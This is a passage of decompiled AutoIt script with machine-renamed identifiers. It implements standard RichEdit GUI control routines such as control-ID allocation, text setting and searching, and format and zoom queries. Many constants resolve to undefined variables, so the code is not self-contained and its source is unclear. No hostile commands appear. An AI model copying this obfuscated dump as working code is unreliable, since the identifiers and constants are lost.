- LOCAL $Local0097 ,$Var04B2 =- 1 ,$Var04B3 =TRUE
- IF NOT WINEXISTS($Arg00)THEN RETURN SETERROR(- 1 ,- 1 , 0 )
- FOR $Local0066 = 0 TO $Var04A6 - 1
- IF $Var04B0 [$Local0066 ][ 0 ]<> 0 THEN
- IF NOT WINEXISTS($Var04B0 [$Local0066 ][ 0 ])THEN
- FOR $Var0149 = 0 TO UBOUND($Var04B0 , 2 )- 1
- $Var04B0 [$Local0066 ][$Var0149 ]= 0
- NEXT
- $Var04B0 [$Local0066 ][ 1 ]=$Var04A8
- $Var04B3 =FALSE
- ENDIF
- ENDIF
- NEXT
- FOR $Local0066 = 0 TO $Var04A6 - 1
- IF $Var04B0 [$Local0066 ][ 0 ]=$Arg00 THEN
- $Var04B2 =$Local0066
- EXITLOOP
- ENDIF
- NEXT
- IF $Var04B2 =- 1 THEN
- FOR $Local0066 = 0 TO $Var04A6 - 1
- IF $Var04B0 [$Local0066 ][ 0 ]= 0 THEN
- $Var04B0 [$Local0066 ][ 0 ]=$Arg00
- $Var04B0 [$Local0066 ][ 1 ]=$Var04A8
- $Var04B3 =FALSE
- $Var04B2 =$Local0066
- EXITLOOP
- ENDIF
- NEXT
- ENDIF
- IF $Var04B2 =- 1 AND $Var04B3 THEN RETURN SETERROR(0x0010 , 0 , 0 )
- IF $Var04B0 [$Var04B2 ][ 1 ]=$Var04A8 +$Var04AA THEN
- FOR $Var04B4 =$Var04A4 TO UBOUND($Var04B0 , 2 )- 1
- IF $Var04B0 [$Var04B2 ][$Var04B4 ]= 0 THEN
- $Local0097 =($Var04B4 -$Var04A4 )+0x2710
- $Var04B0 [$Var04B2 ][$Var04B4 ]=$Local0097
- RETURN $Local0097
- ENDIF
- NEXT
- RETURN SETERROR(- 1 ,$Var04AA , 0 )
- ENDIF
- $Local0097 =$Var04B0 [$Var04B2 ][ 1 ]
- $Var04B0 [$Var04B2 ][ 1 ]+= 1
- $Var04B0 [$Var04B2 ][($Local0097 -0x2710 )+$Var04A4 ]=$Local0097
- RETURN $Local0097
- ENDFUNC
- Func Fn010B($Arg00,$Arg01)
- IF $Arg01-$Var04A8 < 0 OR $Arg01-$Var04A8 >$Var04AA THEN RETURN SETERROR(- 1 , 0 ,FALSE )
- FOR $Local0066 = 0 TO $Var04A6 - 1
- IF $Var04B0 [$Local0066 ][ 0 ]=$Arg00 THEN
- FOR $Var0149 =$Var04A4 TO UBOUND($Var04B0 , 2 )- 1
- IF $Var04B0 [$Local0066 ][$Var0149 ]=$Arg01 THEN
- $Var04B0 [$Local0066 ][$Var0149 ]= 0
- RETURN TRUE
- ENDIF
- NEXT
- RETURN SETERROR(- 3 , 0 ,FALSE )
- ENDIF
- NEXT
- RETURN SETERROR(- 2 , 0 ,FALSE )
- ENDFUNC
- Func Fn010C($Arg00,$ArgOpt01=@SCRIPTLINENUMBER,$ArgOpt02=@ERROR,$ArgOpt03=@EXTENDED)
- CONSOLEWRITE("!==========================================================="& @CRLF &"+======================================================"& @CRLF &"-->Line(" &STRINGFORMAT("%04d" ,$ArgOpt01)&"):" & @TAB &$Arg00& @CRLF &"+======================================================"& @CRLF )
- RETURN SETERROR($ArgOpt02,$ArgOpt03, 1 )
- ENDFUNC
- Func Fn010D($Arg00,$Arg01)
- Fn010C("This is for debugging only, set the debug variable to false before submitting")
- IF Fn007D($Arg00,$Arg01)THEN RETURN TRUE
- LOCAL $Local0048 =OPT("GUIDataSeparatorChar")
- $Arg01=STRINGREPLACE($Arg01,$Local0048 ,"," )
- Fn010C("Invalid Class Type(s):"& @LF & @TAB &"Expecting Type(s): "&$Arg01& @LF & @TAB &"Received Type : "&Fn0045($Arg00))
- EXIT
- ENDFUNC
- GLOBAL $Var04B5 =FALSE
- GLOBAL $Var04B6 ,$Var04B7 ,$Var04B8 ,$Var04B9 =NUMBER($Var04BA )
- GLOBAL $Var04BB ,$Var04BC ,$Var04BD
- GLOBAL $Var04BE =DLLCALLBACKREGISTER("Fn0171",$Var04BF ,$Var04C0 )
- GLOBAL $Var04C1 =DLLCALLBACKREGISTER("Fn0172",$Var04C2 ,$Var04C3 )
- GLOBAL $Var04C4 =DLLCALLBACKREGISTER("Fn0173",$Var04C5 ,$Var04C6 )
- GLOBAL $Var04C7 =DLLCALLBACKREGISTER("Fn0174",$Var04C8 ,$Var04C9 )
- GLOBAL $Var04CA
- GLOBAL $Var04CB
- GLOBAL $Var04CC =DLLSTRUCTCREATE($Var04CD )
- GLOBAL $Var04CE ,$Var04CF
- GLOBAL $Var04D0 =DLLOPEN($Var04D1 )
- GLOBAL $Var04D2 =DLLCALLBACKREGISTER("Fn017D",$Var04D3 ,$Var04D4 )
- GLOBAL $Var04D5 =DLLCALLBACKREGISTER("Fn017E",$Var04D6 ,$Var04D7 )
- GLOBAL $Var04D8 =DLLCALLBACKREGISTER("Fn017F",$Var04D9 ,$Var04DA )
- GLOBAL $Var04DB =DLLCALLBACKREGISTER("Fn0189",$Var04DC ,$Var04DD )
- GLOBAL $Var04DE =DLLCALLBACKREGISTER("Fn0180",$Var04DF ,$Var04E0 )
- GLOBAL $Var04E1 =DLLCALLBACKREGISTER("Fn0181",$Var04E2 ,$Var04E3 )
- GLOBAL $Var04E4 =DLLCALLBACKREGISTER("Fn0182",$Var04E5 ,$Var04E6 )
- GLOBAL $Var04E7 =DLLCALLBACKREGISTER("Fn0183",$Var04E8 ,$Var04E9 )
- GLOBAL $Var04EA =DLLCALLBACKREGISTER("Fn0184",$Var04EB ,$Var04EC )
- GLOBAL $Var04ED =DLLCALLBACKREGISTER("Fn0185",$Var04EE ,$Var04EF )
- GLOBAL $Var04F0 =DLLCALLBACKREGISTER("Fn0186",$Var04F1 ,$Var04F2 )
- GLOBAL $Var04F3 =DLLCALLBACKREGISTER("Fn0187",$Var04F4 ,$Var04F5 )
- GLOBAL $Var04F6 =DLLCALLBACKREGISTER("Fn0188",$Var04F7 ,$Var04F8 )
- GLOBAL CONST $Var04F9 =NUMBER($Var04FA )
- GLOBAL CONST $Var04FB =NUMBER($Var04FC )
- GLOBAL CONST $Var04FD =NUMBER($Var04FE )
- GLOBAL CONST $Var04FF =NUMBER($Var0500 )
- GLOBAL CONST $Var0501 =NUMBER($Var0502 )
- GLOBAL CONST $Var0503 =NUMBER($Var0504 )
- GLOBAL CONST $Var0505 =NUMBER($Var0506 )
- GLOBAL CONST $Var0507 =NUMBER($Var0508 )
- GLOBAL CONST $Var0509 =NUMBER($Var050A )
- GLOBAL CONST $Var050B =NUMBER($Var050C )
- GLOBAL CONST $Var050D =NUMBER($Var050E )
- GLOBAL CONST $Var050F =NUMBER($Var0510 )
- GLOBAL CONST $Var0511 =NUMBER($Var0512 )
- GLOBAL CONST $Var0513 =NUMBER($Var0514 )
- GLOBAL CONST $Var0515 =NUMBER($Var0516 )
- GLOBAL CONST $Var0517 =NUMBER($Var0518 )
- GLOBAL CONST $Var0519 =$Var051A
- GLOBAL CONST $Var051B =$Var051C
- GLOBAL CONST $Var051D =$Var051E &$Var051F
- GLOBAL CONST $Var0520 =$Var051D &$Var0521 &$Var0522
- GLOBAL CONST $Var0523 =$Var0524
- GLOBAL CONST $Var0525 =$Var0523 &$Var0526
- GLOBAL CONST $Var0527 =$Var0523 &$Var0528
- GLOBAL CONST $Var0529 =$Var052A
- GLOBAL CONST $Var052B =$Var052C
- GLOBAL CONST $Var052D =$Var052E &$Var052F
- GLOBAL CONST $Var0530 =$Var052D &$Var0531 &$Var0532 &$Var0533
- GLOBAL CONST $Var0534 =$Var0535
- GLOBAL CONST $Var0536 =$Var0523 &$Var0537
- GLOBAL CONST $Var0538 =$Var0539 &$Var053A &$Var053B
- GLOBAL CONST $Var053C =$Var053D &$Var053A &$Var053E &$Var0523
- Func Fn010E($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- LOCAL $Local0095 =Fn0126($Arg00)
- Fn0167($Arg00,$Local0095 ,$Local0095 )
- LOCAL $Local0096 =DLLSTRUCTCREATE($Var0534 )
- DLLSTRUCTSETDATA($Local0096 , 1 ,$Var02E2 )
- LOCAL $Local0055
- IF STRINGLEFT($Arg01, 5 )<>"{\rtf" AND STRINGLEFT($Arg01, 5 )<>"{urtf" THEN
- DLLSTRUCTSETDATA($Local0096 , 2 ,$Var0302 )
- $Local0055 =Fn0006($Arg00,$Var0274 ,$Local0096 ,$Arg01, 0 ,"struct*" ,"wstr" )
- ELSE
- DLLSTRUCTSETDATA($Local0096 , 2 ,$Var0300 )
- $Local0055 =Fn0006($Arg00,$Var0274 ,$Local0096 ,$Arg01, 0 ,"struct*" ,"STR" )
- ENDIF
- IF NOT $Local0055 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
- RETURN TRUE
- ENDFUNC
- Func Fn010F($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT ISBOOL($Arg01)THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
- IF Fn0006($Arg00,$Var01F8 ,$Arg01)THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
- RETURN TRUE
- ENDFUNC
- Func Fn0110($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- LOCAL $Local0055 =Fn0006($Arg00,$Var01FA , 0 , 0 )
- RETURN $Local0055 <> 0
- ENDFUNC
- Func Fn0111($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- RETURN Fn0006($Arg00,$Var01FA ,$Var04BC , 0 )<> 0 AND Fn0006($Arg00,$Var01FA ,$Var04BD , 0 )<> 0
- ENDFUNC
- Func Fn0112($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- RETURN Fn0006($Arg00,$Var01FC , 0 , 0 )<> 0
- ENDFUNC
- Func Fn0113($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- RETURN Fn0006($Arg00,$Var053F , 0 , 0 )<> 0
- ENDFUNC
- Func Fn0114($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT Fn0176($Arg01)THEN SETERROR(0x0066 , 0 ,FALSE )
- IF NOT Fn0147($Arg00)THEN RETURN SETERROR(- 1 , 0 ,FALSE )
- RETURN Fn0006($Arg00,$Var025C ,$Arg01, 0 )<> 0
- ENDFUNC
- Func Fn0115($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- Fn0006($Arg00,$Var0501 , 0 , 0 )
- RETURN TRUE
- ENDFUNC
- Func Fn0116($Arg00,$Arg01,$Arg02,$Arg03,$ArgOpt04=150,$ArgOpt05=150,$ArgOpt06=-1,$ArgOpt07=-1)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR( 1 , 0 , 0 )
- IF NOT ISSTRING($Arg01)THEN RETURN SETERROR( 2 , 0 , 0 )
- IF NOT Fn0176($Arg02,">=0" )THEN RETURN SETERROR(0x0067 , 0 , 0 )
- IF NOT Fn0176($Arg03,">=0" )THEN RETURN SETERROR(0x0068 , 0 , 0 )
- IF NOT Fn0176($ArgOpt04,">0,-1" )THEN RETURN SETERROR(0x0069 , 0 , 0 )
- IF NOT Fn0176($ArgOpt05,">0,-1" )THEN RETURN SETERROR(0x006A , 0 , 0 )
- IF NOT Fn0176($ArgOpt06,">=0,-1" )THEN RETURN SETERROR(0x006B , 0 , 0 )
- IF NOT Fn0176($ArgOpt07,">=0,-1" )THEN RETURN SETERROR(0x006C , 0 , 0 )
- IF $ArgOpt04=- 1 THEN $ArgOpt04=0x0096
- IF $ArgOpt05=- 1 THEN $ArgOpt05=0x0096
- IF $ArgOpt06=- 1 THEN $ArgOpt06=BITOR($Var0540 ,$Var0541 )
- IF BITAND($ArgOpt06,$Var0541 )<> 0 THEN $ArgOpt06=BITOR($ArgOpt06,$Var0540 )
- IF $ArgOpt07=- 1 THEN $ArgOpt07=0x0200
- $ArgOpt06=BITOR($ArgOpt06,$Var0505 ,$Var0503 )
- IF BITAND($ArgOpt06,$Var0542 )= 0 THEN $ArgOpt06=BITOR($ArgOpt06,$Var0507 )
- LOCAL $Local0097 =Fn010A($Arg00)
- IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
- Fn0170()
- LOCAL $Local0098 =Fn0020($ArgOpt07,$Var04B6 ,"",$ArgOpt06,$Arg02,$Arg03,$ArgOpt04,$ArgOpt05,$Arg00,$Local0097 )
- IF $Local0098 = 0 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
- Fn017C($Local0098 )
- Fn0006($Local0098 ,$Var0509 ,Fn0065($Var0082 ),TRUE )
- Fn010E($Local0098 ,$Arg01)
- RETURN $Local0098
- ENDFUNC
- Func Fn0117($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- Fn0006($Arg00,$Var050B , 0 , 0 )
- RETURN TRUE
- ENDFUNC
- Func Fn0118($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- Fn0006($Arg00,$Var0543 ,- 1 , 0 )
- RETURN TRUE
- ENDFUNC
- Func Fn0119(BYREF $ArgRef00)
- IF $Var04B5 THEN Fn010D($ArgRef00,$Var04B6 )
- IF NOT Fn007D($ArgRef00,$Var04B6 )THEN RETURN SETERROR( 2 , 2 ,FALSE )
- LOCAL $Local0099 = 0
- IF ISHWND($ArgRef00)THEN
- IF Fn007B($ArgRef00,$Var04CB )THEN
- LOCAL $Local0097 =Fn0052($ArgRef00)
- LOCAL $Local009A =Fn0062($ArgRef00)
- $Local0099 =Fn0025($ArgRef00)
- LOCAL $Local0055 =Fn010B($Local009A ,$Local0097 )
- IF NOT $Local0055 THEN
- ENDIF
- ELSE
- RETURN SETERROR( 1 , 1 ,FALSE )
- ENDIF
- ELSE
- $Local0099 =GUICTRLDELETE($ArgRef00)
- ENDIF
- IF $Local0099 THEN $ArgRef00= 0
- RETURN $Local0099 <> 0
- ENDFUNC
- Func Fn011A($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- Fn0006($Arg00,$Var0544 , 0 , 0 )
- RETURN TRUE
- ENDFUNC
- Func Fn011B($Arg00,$Arg01,$ArgOpt02=TRUE ,$ArgOpt03=FALSE ,$ArgOpt04=FALSE ,$ArgOpt05=0)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,- 1 )
- IF $Arg01="" THEN RETURN SETERROR(0x0066 , 0 ,- 1 )
- IF NOT ISBOOL($ArgOpt02)THEN RETURN SETERROR(0x0067 , 0 ,- 1 )
- IF NOT ISBOOL($ArgOpt03)THEN RETURN SETERROR(0x0068 , 0 ,- 1 )
- IF NOT ISBOOL($ArgOpt04)THEN RETURN SETERROR(0x0069 , 0 ,- 1 )
- IF NOT Fn0176($ArgOpt05)THEN RETURN SETERROR(0x0425 , 0 ,- 1 )
- IF BITAND($ArgOpt05,BITNOT(BITOR($Var0357 ,$Var035B ,$Var035D )))<> 0 THEN RETURN SETERROR(0x0426 , 0 ,- 1 )
- LOCAL $Local009B =STRINGLEN($Arg01)+ 3
- LOCAL $Local009C =DLLSTRUCTCREATE("wchar[" &$Local009B &"]" )
- DLLSTRUCTSETDATA($Local009C , 1 ,$Arg01)
- LOCAL $Local009D =DLLSTRUCTCREATE($Var0525 )
- LOCAL $Var0545
- LOCAL $Local009E =Fn0147($Arg00)
- IF $Local009E THEN
- $Var0545 =Fn013C($Arg00)
- ELSE
- $Var0545 =Fn013B($Arg00)
- ENDIF
- DLLSTRUCTSETDATA($Local009D , 1 ,$Var0545 [ 0 ])
- DLLSTRUCTSETDATA($Local009D , 2 ,Fn0102($ArgOpt02,- 1 , 0 ))
- DLLSTRUCTSETDATA($Local009D , 3 ,DLLSTRUCTGETPTR($Local009C ))
- LOCAL $Local009F = 0
- IF $ArgOpt02 THEN $Local009F =$Var0355
- IF $ArgOpt04 THEN $Local009F =BITOR($Local009F ,$Var0361 )
- IF $ArgOpt03 THEN $Local009F =BITOR($Local009F ,$Var0359 )
- $Local009F =BITOR($Local009F ,$ArgOpt05)
- RETURN Fn0006($Arg00,$Var020E ,$Local009F ,$Local009D ,"wparam" ,"ptr" ,"struct*" )
- ENDFUNC
- Func Fn011C($Arg00,$Arg01,$ArgOpt02=0,$ArgOpt03=-1,$ArgOpt04=FALSE ,$ArgOpt05=FALSE ,$ArgOpt06=0)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- IF $Arg01="" THEN RETURN SETERROR(0x0066 , 0 , 0 )
- IF NOT Fn0176($ArgOpt02,">=0,-1" )THEN RETURN SETERROR(0x0067 , 0 , 0 )
- IF NOT Fn0176($ArgOpt03,">=0,-1" )THEN RETURN SETERROR(0x0068 , 0 , 0 )
- IF NOT ISBOOL($ArgOpt04)THEN RETURN SETERROR(0x0069 , 0 , 0 )
- IF NOT ISBOOL($ArgOpt05)THEN RETURN SETERROR(0x006A , 0 , 0 )
- IF NOT Fn0176($ArgOpt06)THEN RETURN SETERROR(0x042F , 0 , 0 )
- IF BITAND($ArgOpt06,BITNOT(BITOR($Var0357 ,$Var035B ,$Var035D )))<> 0 THEN RETURN SETERROR(0x0430 , 0 , 0 )
- LOCAL $Local009B =STRINGLEN($Arg01)+ 3
- LOCAL $Local009C =DLLSTRUCTCREATE("wchar Text["&$Local009B &"]" )
- DLLSTRUCTSETDATA($Local009C ,"Text" ,$Arg01)
- LOCAL $Local009D =DLLSTRUCTCREATE($Var0527 )
- DLLSTRUCTSETDATA($Local009D ,"cpMin" ,$ArgOpt02)
- DLLSTRUCTSETDATA($Local009D ,"cpMax" ,$ArgOpt03)
- DLLSTRUCTSETDATA($Local009D ,"lpstrText" ,DLLSTRUCTGETPTR($Local009C ))
- LOCAL $Local009F = 0
- IF $ArgOpt03>=$ArgOpt02 OR $ArgOpt03=- 1 THEN
- $Local009F =$Var0355
- ENDIF
- IF $ArgOpt05 THEN $Local009F =BITOR($Local009F ,$Var0361 )
- IF $ArgOpt04 THEN $Local009F =BITOR($Local009F ,$Var0359 )
- $Local009F =BITOR($Local009F ,$ArgOpt06)
- Fn0006($Arg00,$Var020C ,$Local009F ,$Local009D ,"iWparam" ,"ptr" ,"struct*" )
- LOCAL $Local008E [ 2 ]
- $Local008E [ 0 ]=DLLSTRUCTGETDATA($Local009D ,"cpMinRang" )
- $Local008E [ 1 ]=DLLSTRUCTGETDATA($Local009D ,"cpMaxRange")
- RETURN $Local008E
- ENDFUNC
- Func Fn011D($Arg00)
- LOCAL CONST $Local00C2 [0x0011 ][ 3 ]=[["bo" ,$Var030E ,$Var0347 ],["di" ,$Var0314 ,$Var0348 ],["em" ,$Var0316 ,$Var0349 ],["hi" ,$Var031A ,$Var034A ],["im" ,$Var031C ,$Var034B ],["it" ,$Var031E ,$Var034C ],["li" ,$Var0324 ,$Var034D ],["ou" ,$Var0328 ,$Var034E ],["pr" ,$Var032A ,$Var034F ],["re" ,$Var032E ,$Var0350 ],["sh" ,$Var0330 ,$Var0351 ],["sm" ,$Var0334 ,$Var0352 ],["st" ,$Var0338 ,$Var0353 ],["sb" ,$Var033C ,$Var0304 ],["sp" ,$Var033D ,$Var0306 ],["un" ,$Var033E ,$Var0354 ],["al" ,$Var0308 ,$Var0344 ]]
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
- LOCAL $Local009E =Fn0147($Arg00)
- IF NOT $Local009E THEN RETURN SETERROR(- 1 , 0 ,"")
- LOCAL $Local00A0 =DLLSTRUCTCREATE($Var0520 )
- DLLSTRUCTSETDATA($Local00A0 , 1 ,DLLSTRUCTGETSIZE($Local00A0 ))
- LOCAL $Local00A1 =Fn0006($Arg00,$Var0218 ,$Var0380 ,$Local00A0 , 0 ,"wparam" ,"struct*" )
- LOCAL $Local00A2 =DLLSTRUCTGETDATA($Local00A0 , 3 )
- LOCAL $Local00A3 ="",$Var0546 ,$Var0547 ,$Var0548
- FOR $Local00EB = 0 TO UBOUND($Local00C2 , 1 )- 1
- $Var0547 =BITAND($Local00A1 ,$Local00C2 [$Local00EB ][ 1 ])=$Local00C2 [$Local00EB ][ 1 ]
- $Var0548 =BITAND($Local00A2 ,$Local00C2 [$Local00EB ][ 2 ])=$Local00C2 [$Local00EB ][ 2 ]
- IF $Local009E THEN
- IF $Var0547 THEN
- IF $Var0548 THEN
- $Var0546 ="+"
- ELSE
- $Var0546 ="-"
- ENDIF
- ELSE
- $Var0546 ="~"
- ENDIF
- ELSE
- IF $Var0547 THEN
- $Var0546 ="+"
- ELSE
- $Var0546 ="-"
- ENDIF
- ENDIF
- IF $Var0546 <>"-" THEN $Local00A3 &=$Local00C2 [$Local00EB ][ 0 ]&$Var0546
- NEXT
- RETURN $Local00A3
- ENDFUNC
- Func Fn011E($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- LOCAL $Local00A0 =DLLSTRUCTCREATE($Var0520 )
- DLLSTRUCTSETDATA($Local00A0 , 1 ,DLLSTRUCTGETSIZE($Local00A0 ))
- Fn017A($Arg00,$Local00A0 )
- LOCAL $Local00A2 =DLLSTRUCTGETDATA($Local00A0 , 3 )
- LOCAL $Local00A8
- IF BITAND($Local00A2 ,$Var0345 )=$Var0345 THEN
- $Local00A8 =Fn0067($Var0511 )
- ELSE
- $Local00A8 =DLLSTRUCTGETDATA($Local00A0 ,0x000C )
- ENDIF
- RETURN SETEXTENDED(BITAND($Local00A2 ,$Var030C )<> 0 ,$Local00A8 )
- ENDFUNC
- Func Fn011F($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- LOCAL $Local00A0 =DLLSTRUCTCREATE($Var051D )
- DLLSTRUCTSETDATA($Local00A0 , 1 ,DLLSTRUCTGETSIZE($Local00A0 ))
- Fn017A($Arg00,$Local00A0 )
- LOCAL $Local00A2 =DLLSTRUCTGETDATA($Local00A0 , 3 )
- LOCAL $Local00DC
- IF BITAND($Local00A2 ,$Var0346 )=$Var0346 THEN
- $Local00DC =Fn0067($Var0511 )
- ELSE
- $Local00DC =DLLSTRUCTGETDATA($Local00A0 , 6 )
- ENDIF
- RETURN SETEXTENDED(BITAND($Local00A2 ,$Var0312 )<> 0 ,$Local00DC )
- ENDFUNC
- Func Fn0120($Arg00,$Arg01,$Arg02)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- IF NOT Fn0176($Arg01)THEN RETURN SETERROR(0x0066 , 0 , 0 )
- IF NOT Fn0176($Arg02)THEN RETURN SETERROR(0x0067 , 0 , 0 )
- LOCAL $Local00A4 =Fn012A($Arg00)
- IF $Arg01<$Local00A4 [ 0 ]OR $Arg01>$Local00A4 [ 2 ]OR $Arg02<$Local00A4 [ 1 ]OR $Arg02>$Local00A4 [ 3 ]THEN RETURN - 1
- LOCAL $Local00A5 =DLLSTRUCTCREATE("LONG x; LONG y;")
- DLLSTRUCTSETDATA($Local00A5 , 1 ,$Arg01)
- DLLSTRUCTSETDATA($Local00A5 , 2 ,$Arg02)
- LOCAL $Local0055 =Fn0006($Arg00,$Var0549 , 0 ,$Local00A5 , 0 ,"wparam" ,"struct*" )
- IF NOT $Local0055 THEN RETURN SETERROR(- 1 , 0 , 0 )
- RETURN $Local0055
- ENDFUNC
- Func Fn0121($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- IF NOT Fn0176($Arg01)THEN RETURN SETERROR(0x0066 , 0 , 0 )
- RETURN Fn0006($Arg00,$Var0210 ,$Var03EA ,$Arg01)
- ENDFUNC
- Func Fn0122($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- IF NOT Fn0176($Arg01)THEN RETURN SETERROR(0x0066 , 0 , 0 )
- RETURN Fn0006($Arg00,$Var0210 ,$Var03E4 ,$Arg01)
- ENDFUNC
- Func Fn0123($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
- IF NOT Fn0176($Arg01)THEN RETURN SETERROR(0x0066 , 0 ,"")
- LOCAL $Local0055 =Fn0006($Arg00,$Var0210 ,$Var03DC ,$Arg01)
- LOCAL $Local00A6 =BITAND($Local0055 ,0x00F0 )
- LOCAL $Local00A7 =""
- IF BITAND($Local00A6 ,$Var03F8 )THEN $Local00A7 &="c"
- IF BITAND($Local00A6 ,$Var03F6 )THEN $Local00A7 &="d"
- IF BITAND($Local00A6 ,$Var03F4 )THEN $Local00A7 &="w"
- $Local00A7 &=";" &BITAND($Local0055 ,0x000F )
- RETURN $Local00A7
- ENDFUNC
- Func Fn0124($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- LOCAL $Local00A8 =Fn0006($Arg00,$Var0254 ,FALSE , 0 )
- Fn0006($Arg00,$Var0254 ,FALSE ,$Local00A8 )
- RETURN $Local00A8
- ENDFUNC
- Func Fn0125($Arg00,$ArgOpt01=FALSE ,$ArgOpt02=0,$ArgOpt03="")
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
- IF NOT ISBOOL($ArgOpt01)THEN RETURN SETERROR(0x0066 , 0 ,"")
- IF NOT Fn0176($ArgOpt02)THEN RETURN SETERROR(0x0067 , 0 ,"")
- LOCAL $Local009B =Fn0126($Arg00,FALSE ,TRUE )+ 1
- LOCAL $Local00A9 =""
- IF $ArgOpt02=$Var0302 OR NOT $ArgOpt02 THEN $Local00A9 ="w"
- LOCAL $Local009C =DLLSTRUCTCREATE($Local00A9 &"char[" &$Local009B &"]" )
- LOCAL $Local00AA =DLLSTRUCTCREATE($Var0529 )
- DLLSTRUCTSETDATA($Local00AA ,"cb" ,DLLSTRUCTGETSIZE($Local009C ))
- LOCAL $Local00AB = 0
- IF $ArgOpt01 THEN $Local00AB =$Var02E8
- DLLSTRUCTSETDATA($Local00AA ,"flags" ,$Local00AB )
- IF $ArgOpt02= 0 THEN $ArgOpt02=$Var0302
- DLLSTRUCTSETDATA($Local00AA ,"codepage" ,$ArgOpt02)
- LOCAL $Local00AC = 0 ,$Var054A = 0
- IF $ArgOpt03<>"" THEN
- LOCAL $Local00AD =DLLSTRUCTCREATE("char" )
- $Var054A =DLLSTRUCTGETPTR($Local00AD , 1 )
- DLLSTRUCTSETDATA($Local00AD , 1 ,$ArgOpt03)
- LOCAL $Local00AE =DLLSTRUCTCREATE("bool" )
- $Local00AC =DLLSTRUCTGETPTR($Local00AE , 1 )
- ENDIF
- DLLSTRUCTSETDATA($Local00AA ,"lpDefaultChar",$Var054A )
- DLLSTRUCTSETDATA($Local00AA ,"lpbUsedDefChar",$Local00AC )
- LOCAL $Local0055 =Fn0006($Arg00,$Var0234 ,$Local00AA ,$Local009C , 0 ,"struct*" ,"struct*" )
- IF $Local0055 = 0 THEN RETURN SETERROR(0x02BC , 0 ,"")
- IF $ArgOpt03<>"" THEN SETEXTENDED(DLLSTRUCTGETDATA($Local00AE , 1 )<> 0 )
- RETURN DLLSTRUCTGETDATA($Local009C , 1 )
- ENDFUNC
- Func Fn0126($Arg00,$ArgOpt01=TRUE ,$ArgOpt02=FALSE )
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- IF NOT ISBOOL($ArgOpt01)THEN RETURN SETERROR(0x0066 , 0 , 0 )
- IF NOT ISBOOL($ArgOpt02)THEN RETURN SETERROR(0x0067 , 0 , 0 )
- LOCAL $Local00AF =DLLSTRUCTCREATE($Var052B )
- LOCAL $Local00AB =BITOR($Var02F4 ,Fn0102($ArgOpt01,$Var02F2 ,$Var02EA ))
- $Local00AB =BITOR($Local00AB ,Fn0102($ArgOpt02,$Var02EC ,$Var02EE ))
- DLLSTRUCTSETDATA($Local00AF , 1 ,$Local00AB )
- DLLSTRUCTSETDATA($Local00AF , 2 ,Fn0102($ArgOpt02,$Var0300 ,$Var0302 ))
- LOCAL $Local0055 =Fn0006($Arg00,$Var0236 ,$Local00AF , 0 , 0 ,"struct*" )
- RETURN $Local0055
- ENDFUNC
- Func Fn0127($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- LOCAL $Local00B0 = 0 ,$Var054B = 0
- LOCAL $Local00B1 =Fn0006($Arg00,$Var0244 ,$Local00B0 ,$Var054B ,- 1 ,"int*" ,"int*" )
- IF NOT $Local00B1 [ 0 ]THEN RETURN SETERROR(0x02BC , 0 , 0 )
- LOCAL $Local0055
- IF $Local00B1 [ 3 ]= 0 AND $Local00B1 [ 4 ]= 0 THEN
- $Local0055 =0x0064
- ELSE
- $Local0055 =$Local00B1 [ 3 ]/$Local00B1 [ 4 ]*0x0064
- ENDIF
- RETURN STRINGFORMAT("%.2f" ,$Local0055 )
- ENDFUNC
- Func Fn0128($Arg00,$ArgOpt01=-1)
